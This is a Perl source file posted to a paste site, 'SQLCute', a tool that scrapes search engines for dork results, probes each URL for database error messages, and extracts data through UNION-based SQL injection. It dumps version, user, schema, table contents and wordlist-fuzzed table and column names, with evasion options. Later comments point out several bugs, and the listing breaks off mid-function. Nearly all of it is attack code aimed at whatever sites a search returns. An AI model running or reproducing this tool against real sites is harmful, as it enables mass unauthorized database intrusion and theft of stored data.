SQLcute


 / Published in: Perl
 

URL: http://pastebin.com/a1eXbnVr

SQL-injection dorker and exploiter. The dorker scrapes search-engine results for a dork and checks each URL for database error messages from up to five different back-ends; the exploiter handles two database types (MySQL via UNION-based extraction, MsSQL via error-based extraction). The project is updated every month. Please don't rip my work, because kittens will die if you do!!! Note for readers: this is an attack tool that fires requests at whatever the search engines return — run it only against systems you are explicitly authorized to test.

  1. #!/usr/bin/perl
  2. =for comment
  3. *-----------------------------------------------------------*
  4. | |
  5. | SQLCute ver 1.0 |
  6. | |
  7. | Revived from a lost project |
  8. | |
  9. | [Edit] Some twat post this code on Google Code |
  10. | the project on GC was actually the incomplete WIP |
  11. | of this code. The [irony] was my original code |
  12. | got fucking removed from the SAME asshole. |
  13. | So much for fucking justice. |
  14. | |
  15. | That stolen code will never work properly b/c its |
  16. | fucking stolen. |
  17. | |
  18. *-----------------------------------------------------------*
  19. =cut
  20. use LWP::UserAgent;
  21. use HTTP::Request;
  22. use Term::ANSIColor qw(:constants);
  23.  
  24. #-----------------------------------------------------------#
  25. # Help menu #
  26. #-----------------------------------------------------------#
  27.  
  28. sub help
  29. {
  30. system('clear');
  31. system('title SQLCute 1.0');
  32. print BLUE, "[!] Usage : $0 <option>\n";
  33. print BOLD, GREEN, "\n--|| MySQL\n\n", RESET;
  34. print GREEN, " --mysqlcol MySQL column length calculator MySQL v4/5\n";
  35. print " --mysqldetails MySQL target website db global infos MySQL v4/5\n";
  36. print " --mysqlschema MySQL Full Schema Extractor MySQL v5\n";
  37. print " --mysqldump MySQL Data Dump MySQL v4/5\n";
  38. print " --mysqlfile MySQL load_file fuzzer MySQL v4/5\n";
  39. print " --mysqltblfuzz MySQL Table_name Fuzzer MySQL v4\n";
  40. print " --mysqlcolfuzz MySQL Column_name Fuzzer MySQL v4\n";
  41. print "-----------------------------------";
  42. print BOLD, GREEN, "\n--|| MsSQL\n\n",RESET;
  43. print GREEN, " --mssqldetails MsSQL DB global info\n";
  44. print " --mssqltable MsSQL Tables Extractor\n";
  45. print " --mssqlcolumns MsSQL Columns Extractor\n";
  46. print " --mssqldump MsSQL Columns Extractor\n";
  47. print "-----------------------------------";
  48. print BOLD, GREEN, "\n--|| Vulnerability Scanner\n\n", RESET;
  49. print GREEN, " --dork URL Extractor , SQL Vulnerability's Scanner & Checker\n";
  50. print "-----------------------------------";
  51. print BOLD, GREEN, "\n--|| Options\n\n", RESET;
  52. print GREEN, " --proxy define a proxy to use\n";
  53. print " --listfile List of columns or tables to use in fuzz or load_file files list\n";
  54. print " --output Save injection or scan result in an outside file\n";
  55. print " --table Table to use in dumping data or in tbles extract\n";
  56. print " --column Column to use in dumping data or in column extract\n";
  57. print " --evasion Evasive string such as %20 -- /**/ (do not include quotes)\n";
  58. print " --help Print this help manual\n";
  59. print " --readme Changes & rants...\n\n";
  60. print "-----------------------------------\n", RESET;
  61. exit();
  62. }
  63.  
  64. sub readme
  65. {
  66. system('clear');
  67. system('title SQLCute 1.0');
  68. print BOLD,RED,"[!] About\n",RESET;
  69. print GREEN,"This project was started at ",RED,"2009\n",RESET;
  70. print GREEN,"and temporary ended at ",RED,"2013\n",RESET;
  71. print GREEN,"Due to: \n",RESET;
  72. print BLUE, "-- Laziness...\n",RESET;
  73. print BLUE, "-- Out of idea\n",RESET;
  74. print BLUE, "-- Been busy\n",RESET;
  75. print BLUE, "-- Looking for help\n\n",RESET;
  76. print GREEN,"Changes were made: \n",RESET;
  77. print BLUE, "-- Mass improvements on injector\n",RESET;
  78. print BLUE, "-- More mass improves on dorker\n",RESET;
  79. print BLUE, "-- Added color UIs\n",RESET;
  80. print BLUE, "-- Fixed legacy bugs\n\n",RESET;
  81. print BOLD, GREEN, "If anyone looking toward to improve this piece of crap\nFeel free to do so!\n\n",RESET;
  82. exit();
  83. }
  84.  
  85. #-----------------------------------------------------------#
  86. # change variables' name below #
  87. #-----------------------------------------------------------#
  88. sub variables
  89. {
  90. my $i=0;
  91. foreach (@ARGV)
  92. {
  93. if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
  94. if ($ARGV[$i] eq "--mysqlcol"){$mysql_count_target = $ARGV[$i+1]}
  95. if ($ARGV[$i] eq "--mysqldetails"){$mysql_details_target = $ARGV[$i+1]}
  96. if ($ARGV[$i] eq "--mysqlschema"){$mysql_schema_target = $ARGV[$i+1]}
  97. if ($ARGV[$i] eq "--mysqldump"){$mysql_dump_target = $ARGV[$i+1]}
  98. if ($ARGV[$i] eq "--mysqltblfuzz"){$mysql_fuzz_table = $ARGV[$i+1]}
  99. if ($ARGV[$i] eq "--mysqlcolfuzz"){$mysql_fuzz_column = $ARGV[$i+1]}
  100. if ($ARGV[$i] eq "--mysqlfile"){$mysql_load_file = $ARGV[$i+1]}
  101. if ($ARGV[$i] eq "--mssqldetails"){$mssql_details_target = $ARGV[$i+1]}
  102. if ($ARGV[$i] eq "--mssqltable"){$mssql_table_target = $ARGV[$i+1]}
  103. if ($ARGV[$i] eq "--mssqlcolumn"){$mssql_column_target = $ARGV[$i+1]}
  104. if ($ARGV[$i] eq "--mssqldump"){$mssql_dump_target = $ARGV[$i+1]}
  105. if ($ARGV[$i] eq "--column"){$sql_dump_column = $ARGV[$i+1]}
  106. if ($ARGV[$i] eq "--table"){$sql_dump_table = $ARGV[$i+1]}
  107. if ($ARGV[$i] eq "--evasion"){$evasion = $ARGV[$i+1]}
  108. if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
  109. if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
  110. if ($ARGV[$i] eq "--listfile"){$word_list = $ARGV[$i+1]}
  111. if ($ARGV[$i] eq "--help"){&help}
  112. if ($ARGV[$i] eq "--readme"){&readme}
  113. $i++;
  114. }
  115. }
  116.  
  117.  
  118.  
  119. sub main
  120. {
  121. system('clear');
  122. system('title AutoSQL Injector');
  123. print BLUE, " \n--------------------------------------\n";
  124. print YELLOW, " \n SQLCute 1.0\n";
  125. print RED," \n madfedora";
  126. print " \n mad.hatter\@gmail.com\n";
  127. print BLUE," \n--------------------------------------\n\n", RESET;
  128. if (@ARGV<1){print "[?] For Help : $0 --help\n\n" ;}
  129. }
  130.  
# --dork driver: prime the search engine once, then push every URL the
# two search back-ends return through checkvuln().
# Both search subs receive $search_dork, but search1() ignores its
# argument and reads the global directly.
sub vulnscanner
{
checksearch();
search1($search_dork);
search2($search_dork);
}
# Issue a single warm-up query to the search engine with a spoofed
# browser User-Agent.  The body is stored in a lexical ($result) that is
# never read, so the only effect of this sub is the network round-trip.
# $search_dork and $proxy are interpolated verbatim: the dork is not
# URI-encoded, so '&', '#' or spaces in it reach the engine as typed,
# and no timeout is set on the agent.
sub checksearch
{
#my $request = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=50");
#-----------------------------------------------------------#
# Change page numbers above #
#-----------------------------------------------------------#
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 6.1) AppleWebKit/531.6.2 (KHTML, like Gecko) Version/5.1 Safari/531.6.2');
#-----------------------------------------------------------#
# Add your agent of choice above #
#-----------------------------------------------------------#
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->request($request) ;
my $result = $response->content;
}
  152.  
# Page through search-results.com (page=0,10,...,190) for the dork and
# feed every scraped result link to checkvuln().
#
# The $dork argument is unpacked but never used; the request
# interpolates the global $search_dork instead.  $i is a package global
# (no 'my') shared with the other loops in this file.  Links are pulled
# out with a regex tied to the engine's markup of the time
# ('class=r><a href="..." class=l>'), so a markup change yields zero hits
# rather than an error.  The agent has no timeout.
sub search1
{
my $dork = $_[0];
for ($i=0;$i<200;$i=$i+10)
{
my $request = HTTP::Request->new(GET => "http://www.search-results.com/web?q=$search_dork&s&hl=en&page=$i");
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0(X11; Linux i686) AppleWebKit/5310 (KHTML, like Gecko) Chrome/13.0.889.0 Safari/5310');
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->request($request) ;
my $result = $response->content;
while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
{
print BLUE, "[!] Dorking > $1\n", RESET;
checkvuln($1)
}
}
}
# Page through us.ask.com (page=0..19) for the dork and feed each scraped
# host to checkvuln() with "http://" prepended.
#
# The span regex uses greedy (.*) captures under /gi, so on a long
# single line one match can run across several results and hand a
# mangled string to checkvuln().  $dork is interpolated into the query
# without URI-encoding.  $i is the shared package global, as in search1().
sub search2
{
my $dork = $_[0];
for ($i=0;$i<20;$i++)
{
my $request = HTTP::Request->new(GET => "http://us.ask.com/web?q=$dork&page=$i");
my $useragent = LWP::UserAgent->new(agent => 'Mozilla/5.0');
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->request($request) ;
my $result = $response->content;
while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
{
my $askurl ="http://".$3 ;
print BLUE, "[!] Dorking > $askurl\n",RESET;
checkvuln($askurl);
}
}
}
  188.  
# Probe one URL for an error-based SQL injection tell and bucket it.
#
# The probe appends '0+order+by+9999999--' directly to $scan_url (no
# separator), so it only makes sense when the scraped URL already ends
# in an injectable parameter value.  The response body is matched, in
# order, against a fixed list of DBMS/driver error strings; the first
# branch that matches prints a label and, only when --output was given,
# pushes the URL onto one of the package arrays @mysqlvuln / @accessvuln
# / @mssqlvuln.  Nothing in the visible part of this file ever writes
# those arrays to $vulnfile.
#
# Bucketing is loose: the PostgreSQL, JDBC/OLEDB and Sybase branches all
# push onto @mssqlvuln, and the 'VBScript Runtime' branch records the
# URL even though it prints "Not Injectable".  A matching error string
# only shows the page leaks DB errors, not that it is exploitable.
#
# Regex notes: the '()' in m/FetchRow()/ and m/GetArray()/ are empty
# groups, not literal parentheses, and the '.' in m/ADODB.Field/ is
# unescaped.  Several prints omit the comma after WHITE / YELLOW; the
# Term::ANSIColor constants take a trailing list, so these should still
# print, but they read as typos.  The agent has no timeout, so one slow
# host stalls the whole scan.
sub checkvuln
{
my $scan_url = $_[0];
my $link = $scan_url.'0+order+by+9999999--';
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $req = $ua->get($link);
my $fuzz = $req->content;
#-----------------------------------------------------------#
# MySQL #
#-----------------------------------------------------------#
if ($fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/mysql_numrow/i)

{
print BOLD, GREEN, "[!] MySQL Num Row -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}

elsif ($fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/FetchRow()/i|| $fuzz =~ m/GetArray()/i )
{
print BOLD, GREEN, "[!] MySQL Fetch (Array/Row) -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}

elsif ($fuzz =~ m/Unexpected EOF found when reading file/i)
{
print BOLD, GREEN, "[!] MySQL EOF -> $scan_url\n", RESET;
print BOLD, WHITE "[*] Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}

elsif ($fuzz =~ m/Triggers can not be created on system tables/i)
{
print BOLD, GREEN, "[!] MySQL NO TRIGGERS -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Can't get working directory/i)
{
print BOLD, GREEN, "[!] MySQL Directory -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i)
{
print BOLD, GREEN, "[!] MySQL Error Misc -> $scan_url\n", RESET;
print BOLD, WHITE "[*] Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mysqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Microsoft OLE/ODBC/JET [MsSQL/Access] #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/ODBC SQL Server Driver/i || $fuzz =~ m/ODBC Microsoft Access Driver/i || $fuzz =~ m/OLE DB Provider for ODBC/i)
{
print BOLD, GREEN, "[!] Microsoft ODBC [Access] -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@accessvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Microsoft OLE DB Provider for SQL Server/i || $fuzz =~ m/Unclosed quotation mark/i)
{
print BOLD, GREEN, "[!] Microsoft OLE DB [MsSQL] -> $scan_url\n", RESET;
print BOLD, WHITE "[*] Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/VBScript Runtime/i)
{
print BOLD, GREEN, "[!] VBScript Runtime [MsSQL] -> $scan_url\n", RESET;
print BOLD, YELLOW "[*] Not Injectable\n", RESET;
# recorded anyway when --output is set, despite the "Not Injectable" label
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/Microsoft JET Database/i)
{
print BOLD, GREEN, "[!] Microsoft JET [Access] -> $scan_url\n", RESET;
print BOLD, WHITE "[*] Possible Injection\n", RESET;
if (defined($vulnfile))
{
push (@accessvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# ADO DB #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/Invalid Querystring/i)
{
print BOLD, GREEN, "[!] ADO DB Invalid Querystring -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ADODB.Field/i)
{
print BOLD, GREEN, "[!] ADO DB ADODB.Field -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/ADODB.Command/i )
{
print BOLD, GREEN, "[!] ADO DB ADODB.Command -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
elsif ($fuzz =~ m/BOF or EOF/i)
{
print BOLD, GREEN, "[!] ADO DB BOF or EOF -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# PostgreSQL #
#-----------------------------------------------------------#
# note: PostgreSQL hits are filed under @mssqlvuln
elsif ($fuzz =~ m/postgresql.util/i || $fuzz =~ m/psql: could not connect to server/i || $fuzz =~ m/psql: FATAL/i || $fuzz =~ m/dynamic_result_sets_returned/i || $fuzz =~ m/null_value_eliminated_in_set_function/i || $fuzz =~ m/ERROR: invalid input syntax for integer/i )
{
print BOLD, GREEN, "[!] PosgreSQL -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Oracle #
#-----------------------------------------------------------#
# note: matches a .NET OLEDB namespace as well as the Oracle JDBC driver
elsif ($fuzz =~ m/oracle.jdbc/i || $fuzz =~ m/system.data.oledb/i )
{
print BOLD, GREEN, "[!] JDBC -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
#-----------------------------------------------------------#
# Sybase #
#-----------------------------------------------------------#
elsif ($fuzz =~ m/Warning: sybase_query()/i || $fuzz =~ m/sybase_fetch_assoc()/i )
{
print BOLD, GREEN, "[!] Sybase -> $scan_url\n", RESET;
if (defined($vulnfile))
{
push (@mssqlvuln,"$scan_url\n");
}
}
}
  361. #-----------------------------------------------------------#
  362. # Below here is injector #
  363. #-----------------------------------------------------------#
  364.  
# --mysqlcol: confirm an error-based tell on $site, then brute-force the
# UNION column count (1..100 columns) using evasion style $ev.
#
# $ev '/*' selects '/**/' spacing with a '/*' terminator, '%20' selects
# '%20' / '%00', anything else '+' / '--'.  $add is set but unused here.
#
# Known problems, left exactly as found:
#  * The confirmation probe is built with a comma, not a dot:
#      my $injection = $site.$null.$code."0",$com ;
#    assignment binds tighter than the comma, so $com is discarded and
#    the probe goes out without its comment terminator.
#  * The column loop selects the hex literal 0x7075707079 (which decodes
#    to the ASCII string "puppy") but tests the response for the literal
#    'sqlcute', so the success branch cannot fire on the injected marker
#    -- only on a page that happens to contain 'sqlcute' already.
#  * $col, $specialword, $sql, $ua, $rq, $response and $i are package
#    globals (no 'my') and leak out of this sub.
#  * $vulnfile comes straight from --output and is opened with two-arg
#    open on a bareword handle with no error check.
# Every loop iteration is one HTTP request with no timeout or delay.
sub mysqlcount
{
my $site = $_[0];
my $ev = $_[1];
my $null = "09'+and+1=" ;
my $code = "0+union+select+" ;
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
# comma operator: $com is NOT appended (see header)
my $injection = $site.$null.$code."0",$com ;
my $useragent = LWP::UserAgent->new();
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->get($injection);
my $result = $response->content;
if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/supplied argument is not a valid MySQL/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
{
print BOLD, GREEN, "\n[!] This Website Is Vulnerable\n", RESET ;
print GREEN,"[+] Working On It\n",RESET;
}
else
{
print BOLD, YELLOW, "\n[!] This WebSite Is Not Vulnerable !\n", RESET;
exit();
}
# iteration $i sends a UNION of $i+1 columns; on $i == 0 the accumulators
# are reset so the first probe is a single-column select
for ($i = 0 ; $i < 100 ; $i ++)
{
$col.=','.$i;
$specialword.=','."0x7075707079";
if ($i == 0)
{
$specialword = '' ;
$col = '' ;
}
$sql=$site.$null.$code."0x7075707079".$specialword.$com ;
$ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
$rq = $ua->get($sql);
$response = $rq->content;
# 'sqlcute' is not what 0x7075707079 decodes to (see header)
if($response =~ /sqlcute/)
{
$i ++;
print "\n[!] SQL Column Count Finished\n" ;
print BOLD, GREEN, "[!] This WebSite Have $i Columns\n",RESET;
$sql=$site.$null.$code."0".$col.$com ;
print "=> ".$sql ."\n\n";
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "Target Host : $site\n";
print vuln_file "Evasion : $ev\n";
print vuln_file "Col length : $i\n";
print vuln_file "Injection : $sql\n";
close(vuln_file);
print YELLOW,"[+] Result Saved to $vulnfile\n",RESET;
}
exit () ;
}
}
}
  427.  
# --mysqldetails: replace the NullArea placeholder in $site with a
# concat() of version(), database() and user(), fetch once, and print
# the three values split on the marker.
#
# The placeholder match is /(.*)NullArea(.*)/i with greedy captures, so
# the last case-insensitive occurrence in the URL is the one replaced.
# The injected marker is 0x7075707079 ("puppy" in ASCII) while the
# response is split on 'sqlcute', so as written the extraction reports
# "Failed" unless the page already contains that text.  $add is set but
# unused; $com is appended as the terminator.  --output is written via
# an unchecked two-arg open on a bareword handle.  Every path exits.
sub mysqldetails
{
my $site = $_[0];
my $ev = $_[1];
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
my $selection = "concat(0x7075707079,version(),0x7075707079,database(),0x7075707079,user(),0x7075707079)";
print YELLOW,"\n[+] Info Getting, Started Please Wait!\n\n",RESET;
if ($site =~ /(.*)NullArea(.*)/i)
{
my $newlink = $1.$selection.$2.$com;
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $ua->get($newlink);
my $content = $request->content;
# marker mismatch: see header
if ($content =~ /sqlcute(.*)sqlcute(.*)sqlcute(.*)sqlcute/)
{
print GREEN,"[!] Database Version : $1\n";
print "[!] Database Name : $2\n";
print "[!] DB UserName : $3\n",RESET;
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[!] Target : $site\n";
print vuln_file "[!] evasion : $ev\n";
print vuln_file "[!] Database Version : $1\n";
print vuln_file "[!] Database Name : $2\n";
print vuln_file "[!] DB UserName : $3\n";
close(vuln_file);
print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
}
exit () ;
}
else
{
print BOLD,BRIGHT_RED,"[!] Failed\n",RESET;
exit () ;
}
}
else
{
print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
exit () ;
}
}
  477.  
# --mysqlschema: walk information_schema.columns one row per request
# (LIMIT $i,1 for $i = 0..1000 -- 1001 requests regardless of how many
# rows exist) and print "column :|: table :|: database" for each hit.
#
# Same NullArea placeholder handling and 'puppy'/'sqlcute' marker
# mismatch as mysqldetails().  $newstring and $i are package globals.
# The inner match in the loop also sets $1/$2; whether the outer URL
# captures are restored on the next iteration depends on Perl's block
# scoping of capture variables -- NOTE(review): verify before relying on
# it.  The --output handle is opened (two-arg, unchecked) and never
# closed here, so its buffer is only flushed at exit.
sub mysqlschema
{
my $site = $_[0];
my $ev = $_[1];
my @schema=();
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
my $selection = "concat(0x7075707079,column_name,0x7075707079,table_name,0x7075707079,table_schema,0x7075707079)";
print GREEN,"\n[+] Schema Extracting, Started Please Wait!\n\n",RESET;
if ($site =~ /(.*)NullArea(.*)/i)
{
print GREEN,"[+] Column :|: Table :|: Database\n",RESET;
for ($i=0; $i<=1000 ; $i++ )
{
$newstring = $1.$selection.$2.$add.'from'.$add.'information_schema.columns'.$add.'LIMIT'.$add.$i.','.'1'.$com;
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $ua->get($newstring);
my $content = $request->content;
if ($content =~ /sqlcute(.*)sqlcute(.*)sqlcute(.*)sqlcute/)
{
print "[!] $1 :|: $2 :|: $3 \n";
push (@schema,"$1 :|: $2 :|: $3 \n");
}
}
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[!] Target : $site\n";
print vuln_file "[!] evasion : $ev\n";
print vuln_file "[!] Schema :: ---- \n\n\n";
$i=0;
foreach(@schema)
{
print vuln_file $schema[$i]."\n";
$i++;
}
# no close(vuln_file) here
print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
}
}
else
{
print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
exit () ;
}
}
  528.  
# --mysqldump: pull one row of $colm from $tble per request (LIMIT $i,1
# for $i = 0..1499, always 1500 requests) and print/record each value
# found between the markers.
#
# $colm and $tble are the raw --column / --table strings spliced into
# the SELECT; $site must contain the NullArea placeholder.  The marker
# mismatch (0x7075707079 is "puppy", the check is for 'sqlcute') applies
# here too.  $newstring and $i are package globals.  --output uses an
# unchecked two-arg open on a bareword handle (closed afterwards).
sub mysqldump
{
my $site = $_[0];
my $colm = $_[1];
my $tble = $_[2];
my $ev = $_[3];
print GREEN,"[+] Table name $tble\n";
print "[+] Column name $colm\n",RESET;
my @dumper=();
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
my $selection = "concat(0x7075707079,$colm,0x7075707079)";
print GREEN,"\n[+] Data Dump Started Please Wait!\n\n",RESET;
if ($site =~ /(.*)NullArea(.*)/i)
{
$i=0;
print GREEN,"[+] Dumped Data : \n",RESET;
do
{
$newstring = $1.$selection.$2.$add.'from'.$add.$tble.$add.'LIMIT'.$add.$i.','.'1'.$com;
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $ua->get($newstring);
my $content = $request->content;
if ($content =~ /sqlcute(.*)sqlcute/)
{
print "[!] $1 \n";
push(@dumper,"$1\n");
}
$i++;
}
while ($i<1500);
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[!] Target : $site\n";
print vuln_file "[!] evasion : $ev\n";
print vuln_file "[!] Dumped Column : $colm\n";
print vuln_file "[!] Dumped Table : $tble\n";
print vuln_file "[!] Data :: ---- \n\n\n";
$i=0;
foreach(@dumper)
{
print vuln_file $dumper[$i]."\n";
$i++;
}
close(vuln_file);
print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
}
}
else
{
print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
exit () ;
}
}
  589.  
# --mysqltblfuzz: for each line of the --listfile wordlist, inject
# 'SELECT 0x7075707079 FROM <word>' through the NullArea placeholder and
# report the word as an existing table if the page echoes 'sqlcute'.
#
# Operator-side hazard: $filelst is the raw --listfile argument and is
# opened with two-arg open, so a value such as "|cmd" or ">file" is
# treated as a pipe/mode instead of a filename.  Use three-arg open:
# open(my $fh, '<', $filelst).  The handle is a bareword and is never
# closed.
# Wordlist lines are not chomped: the trailing newline is embedded in
# the URL and also supplies the line break for the "Trying To Fuzz"
# message.  The 'puppy'/'sqlcute' marker mismatch applies here as well.
# $newstring, $i and @word_list_search are package globals.
sub mysqlfuzztable
{
my $site = $_[0];
my $ev = $_[1];
my $filelst = $_[2];
print GREEN,"[+] File List $filelst\n",RESET;
my @tbles_possible=();
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
# two-arg open on an operator-supplied path (see header)
open (word_list_file,"$filelst") or die BOLD,YELLOW,"[!] Couldn't Open WordList File $!\n",RESET;
@word_list_search = <word_list_file> ;
print GREEN,"\n[+] Fuzzing Table, Started Please Wait!\n\n",RESET;
if ($site =~ /(.*)NullArea(.*)/i)
{
print GREEN,"[+] Fuzz Result : \n\n",RESET;
$i=0;
foreach (@word_list_search)
{
print GREEN,"[!] Trying To Fuzz Table_name with $word_list_search[$i]",RESET;
$newstring = $1."0x7075707079".$2.$add.'from'.$add.$word_list_search[$i].$com;
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $ua->get($newstring);
my $content = $request->content;
if ($content =~ /sqlcute/)
{
print BOLD,GREEN,"\n[!] Found Table ! $word_list_search[$i] \n",RESET;
push(@tbles_possible,"$word_list_search[$i]\n");
}
$i++;
}
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[!] Target : $site\n";
print vuln_file "[!] evasion : $ev\n";
print vuln_file "[!] Wordlist : $filelst\n";
print vuln_file "[!] Tbles Found :: ---- \n\n\n";
$i=0;
foreach(@tbles_possible)
{
print vuln_file $tbles_possible[$i]."\n";
$i++;
}
close(vuln_file);
print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
}
}
else
{
print BOLD,YELLOW,"[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n",RESET;
exit () ;
}
}
  648.  
# --mysqlcolfuzz: for each line of the --listfile wordlist, inject
# concat(0x7075707079,<word>) FROM $tablext through the NullArea
# placeholder and report the word as a column if the page echoes
# 'sqlcute'.  (The hit message says "File Column"; it means a column.)
#
# Same operator-side hazard as mysqlfuzztable(): the raw --listfile
# value goes into a two-arg open on a bareword handle that is never
# closed; prefer open(my $fh, '<', $filelst).  Wordlist lines keep
# their trailing newline, which lands inside the concat() call.  The
# 'puppy'/'sqlcute' marker mismatch applies here too.  $tablext is the
# raw --table string.  The second print omits the comma after GREEN
# (Term::ANSIColor constants accept a list, so it should still print).
sub mysqlfuzzcolumn
{
my $site = $_[0];
my $ev = $_[1];
my $filelst = $_[2];
my $tablext = $_[3];
print GREEN,"[+] File List $filelst\n";
print GREEN"[+] Table To Fuzz Columns $tablext\n",RESET;
my @cols_possible=();
if ($ev eq '/*')
{$add = "/**/" ; $com = "/*";}
elsif ($ev eq '%20')
{$add = "%20" ; $com = "%00" ;}
else
{$add = '+' ; $com ='--';}
# two-arg open on an operator-supplied path (see header)
open (word_list_file,"$filelst") or die RED,"[!] Couldnt Open WordList File $!\n",RESET;
@word_list_search = <word_list_file> ;
print GREEN,"\n[+] Fuzzing Column, Started Please Wait!\n\n",RESET;
if ($site =~ /(.*)NullArea(.*)/i)
{
print GREEN,"[+] Fuzz Result : \n\n",RESET;
$i=0;
foreach (@word_list_search)
{
print GREEN,"[!] Trying To Fuzz Column_name with $word_list_search[$i]",RESET;
$newstring = $1."concat(0x7075707079,$word_list_search[$i])".$2.$add.'from'.$add.$tablext.$com;
my $ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
my $request = $ua->get($newstring);
my $content = $request->content;
if ($content =~ /sqlcute/)
{
print GREEN,"\n[!] File Column ! $word_list_search[$i] \n",RESET;
push(@cols_possible,"$word_list_search[$i]\n");
}
$i++;
}
if (defined($vulnfile))
{
open(vuln_file,">>$vulnfile") ;
print vuln_file "[!] Target : $site\n";
print vuln_file "[!] evasion : $ev\n";
print vuln_file "[!] Wordlist : $filelst\n";
print vuln_file "[!] Cols Found :: ---- \n\n\n";
$i=0;
foreach(@cols_possible)
{
print vuln_file $cols_possible[$i]."\n";
$i++;
}
